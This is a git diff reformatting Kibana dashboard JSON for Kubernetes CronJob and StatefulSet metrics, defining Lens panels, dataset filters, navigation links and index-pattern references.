"panelIndex": "85ecbb8b-9606-4c19-a108-385f825ad7aa", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", - "type": "index-pattern" + "panelIndex": "85ecbb8b-9606-4c19-a108-385f825ad7aa", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d5426f2b-4d1b-4499-ad29-0851bdce599b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "50909abf-3224-4a23-9b48-e80ea170fa2c": { + "columnOrder": [ + "2dbcdfac-a084-43ef-9a51-4dc44305f10c", + "ce290fde-639d-45c5-b54b-49fd6b876437" + ], + "columns": { + "2dbcdfac-a084-43ef-9a51-4dc44305f10c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.cronjob.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "d5426f2b-4d1b-4499-ad29-0851bdce599b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "50909abf-3224-4a23-9b48-e80ea170fa2c": { - "columnOrder": [ - "2dbcdfac-a084-43ef-9a51-4dc44305f10c", - "ce290fde-639d-45c5-b54b-49fd6b876437" - ], - 
"columns": { - "2dbcdfac-a084-43ef-9a51-4dc44305f10c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.cronjob.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.cronjob.name" - }, - "ce290fde-639d-45c5-b54b-49fd6b876437": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.cronjob.active.count\": *" - }, - "isBucketed": false, - "label": "Active CronJobs", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.active.count" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "d5426f2b-4d1b-4499-ad29-0851bdce599b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_cronjob" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_cronjob" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - 
"breakdownByAccessor": "2dbcdfac-a084-43ef-9a51-4dc44305f10c", - "collapseFn": "sum", - "layerId": "50909abf-3224-4a23-9b48-e80ea170fa2c", - "layerType": "data", - "metricAccessor": "ce290fde-639d-45c5-b54b-49fd6b876437" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.cronjob.name" }, - "title": "Active CronJobs [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "ce290fde-639d-45c5-b54b-49fd6b876437": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.cronjob.active.count\": *" + }, + "isBucketed": false, + "label": "Active CronJobs", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.active.count" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", - "w": 16, - "x": 32, - "y": 0 + "indexpattern": { + "layers": {} }, - "panelIndex": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d5426f2b-4d1b-4499-ad29-0851bdce599b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_cronjob" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_cronjob" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "2dbcdfac-a084-43ef-9a51-4dc44305f10c", + "collapseFn": "sum", + "layerId": "50909abf-3224-4a23-9b48-e80ea170fa2c", + "layerType": "data", + "metricAccessor": 
"ce290fde-639d-45c5-b54b-49fd6b876437" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "204eb33a-97ff-4d38-bee0-d93387164ab1", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7711169c-3a7b-4071-98d0-3644aa1dde0b": { - "columnOrder": [ - "0ef9858e-46db-48c0-ae7c-4da231c9744b", - "8782d440-1d9a-4826-888b-07cda7c4668a", - "e8b720ef-3fec-4c63-8a7a-b64900c938a1", - "118dfa8c-388e-430c-860f-ce84cf88ac39" - ], - "columns": { - "0ef9858e-46db-48c0-ae7c-4da231c9744b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "CronJob ", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.cronjob.name" - }, - "118dfa8c-388e-430c-860f-ce84cf88ac39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time until Next Schedule(sec)", - "operationType": "median", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.next_schedule.sec" - }, - "8782d440-1d9a-4826-888b-07cda7c4668a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time since Creation(sec)", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.created.sec" - }, - "e8b720ef-3fec-4c63-8a7a-b64900c938a1": { - 
"customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time since Last Schedule(sec)", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.last_schedule.sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Active CronJobs [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", + "w": 16, + "x": 32, + "y": 0 + }, + "panelIndex": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "204eb33a-97ff-4d38-bee0-d93387164ab1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7711169c-3a7b-4071-98d0-3644aa1dde0b": { + "columnOrder": [ + "0ef9858e-46db-48c0-ae7c-4da231c9744b", + "8782d440-1d9a-4826-888b-07cda7c4668a", + "e8b720ef-3fec-4c63-8a7a-b64900c938a1", + "118dfa8c-388e-430c-860f-ce84cf88ac39" + ], + "columns": { + "0ef9858e-46db-48c0-ae7c-4da231c9744b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CronJob ", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "204eb33a-97ff-4d38-bee0-d93387164ab1", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": 
"kubernetes.state_cronjob" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_cronjob" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "0ef9858e-46db-48c0-ae7c-4da231c9744b", - "isTransposed": false - }, - { - "columnId": "8782d440-1d9a-4826-888b-07cda7c4668a", - "isTransposed": false - }, - { - "columnId": "e8b720ef-3fec-4c63-8a7a-b64900c938a1", - "isTransposed": false - }, - { - "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", - "isTransposed": false - } - ], - "layerId": "7711169c-3a7b-4071-98d0-3644aa1dde0b", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.cronjob.name" + }, + "118dfa8c-388e-430c-860f-ce84cf88ac39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time until Next Schedule(sec)", + "operationType": "median", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.next_schedule.sec" + }, + "8782d440-1d9a-4826-888b-07cda7c4668a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time since Creation(sec)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.created.sec" }, - "title": "CronJobs Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "e8b720ef-3fec-4c63-8a7a-b64900c938a1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time since Last Schedule(sec)", + "operationType": 
"last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.last_schedule.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "204eb33a-97ff-4d38-bee0-d93387164ab1", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_cronjob" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", - "w": 48, - "x": 0, - "y": 7 - }, - "panelIndex": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", - "title": "CronJobs Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Cronjobs", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-11-02T11:54:35.308Z", - "id": "kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:d5426f2b-4d1b-4499-ad29-0851bdce599b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:204eb33a-97ff-4d38-bee0-d93387164ab1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_adf38acd-ecc8-48b2-b7f3-d6dfd024e46b:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": 
"kubernetes.state_cronjob" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "0ef9858e-46db-48c0-ae7c-4da231c9744b", + "isTransposed": false + }, + { + "columnId": "8782d440-1d9a-4826-888b-07cda7c4668a", + "isTransposed": false + }, + { + "columnId": "e8b720ef-3fec-4c63-8a7a-b64900c938a1", + "isTransposed": false + }, + { + "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", + "isTransposed": false + } + ], + "layerId": "7711169c-3a7b-4071-98d0-3644aa1dde0b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "CronJobs Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_3e873627-001d-47c7-91a8-995014b0ef90:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 14, + "i": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", + "w": 48, + "x": 0, + "y": 7 }, - { - "id": "metrics-*", - "name": "controlGroup_f4b8cf46-4644-4713-872d-dccc4aeb1e44:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", + "title": "CronJobs Informations [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Cronjobs", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:d5426f2b-4d1b-4499-ad29-0851bdce599b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", + "type": 
"index-pattern" + }, + { + "id": "metrics-*", + "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:204eb33a-97ff-4d38-bee0-d93387164ab1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_adf38acd-ecc8-48b2-b7f3-d6dfd024e46b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_3e873627-001d-47c7-91a8-995014b0ef90:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f4b8cf46-4644-4713-872d-dccc4aeb1e44:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json index 8d60beea3da..a9c7c65f888 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json 
@@ -1,1040 +1,1048 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"5f6614ff-57c0-400e-8350-47e86ad5c77f\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"5f6614ff-57c0-400e-8350-47e86ad5c77f\",\"enhancements\":{}}},\"6faac538-d3fd-4f77-85cc-3b7171c7144c\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"6faac538-d3fd-4f77-85cc-3b7171c7144c\",\"enhancements\":{}}},\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.statefulset.name\",\"title\":\"StatefulSet Name\",\"id\":\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\",\"enhancements\":{}}}}" - }, - "description": "Metrics about StatefulSets", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NCwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"5f6614ff-57c0-400e-8350-47e86ad5c77f\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"5f6614ff-57c0-400e-8350-47e86ad5c77f\",\"enhancements\":{}}},\"6faac538-d3fd-4f77-85cc-3b7171c7144c\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"6faac538-d3fd-4f77-85cc-3b7171c7144c\",\"enhancements\":{}}},\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.statefulset.name\",\"title\":\"StatefulSet Name\",\"id\":\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\",\"enhancements\":{}}}}" + }, + "description": "Metrics about StatefulSets", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), 
[Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56), [Kubernetes Proxy](#/view/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56), [Kubernetes Proxy](#/view/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58)", - "openLinksInNewTab": false + "panelIndex": 
"f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "988215de-1bb2-4dd7-91a4-a07d3d436b89", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1e1f286b-da16-49ab-8ad6-cef60c577ce5": { + "columnOrder": [ + "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", + "615a6b08-bc26-4d84-8c18-7a9936cabbfb" + ], + "columns": { + "615a6b08-bc26-4d84-8c18-7a9936cabbfb": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.observed\": *" + }, + "isBucketed": false, + "label": "Replicas Observed ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.observed" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "type": "index-pattern" + "ccb9ef58-565b-4ffe-bb2e-60819199ccfc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + 
"includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "988215de-1bb2-4dd7-91a4-a07d3d436b89", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1e1f286b-da16-49ab-8ad6-cef60c577ce5": { - "columnOrder": [ - "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", - "615a6b08-bc26-4d84-8c18-7a9936cabbfb" - ], - "columns": { - "615a6b08-bc26-4d84-8c18-7a9936cabbfb": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.observed\": *" - }, - "isBucketed": false, - "label": "Replicas Observed ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.observed" - }, - "ccb9ef58-565b-4ffe-bb2e-60819199ccfc": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, 
- "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "988215de-1bb2-4dd7-91a4-a07d3d436b89", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", - "collapseFn": "sum", - "layerId": "1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "layerType": "data", - "metricAccessor": "615a6b08-bc26-4d84-8c18-7a9936cabbfb" - } - }, - "title": "StatefulSet Replicas Observed [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "d8265dae-829d-434f-a826-cc6062edfd3a", - "w": 9, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "d8265dae-829d-434f-a826-cc6062edfd3a", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "988215de-1bb2-4dd7-91a4-a07d3d436b89", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": 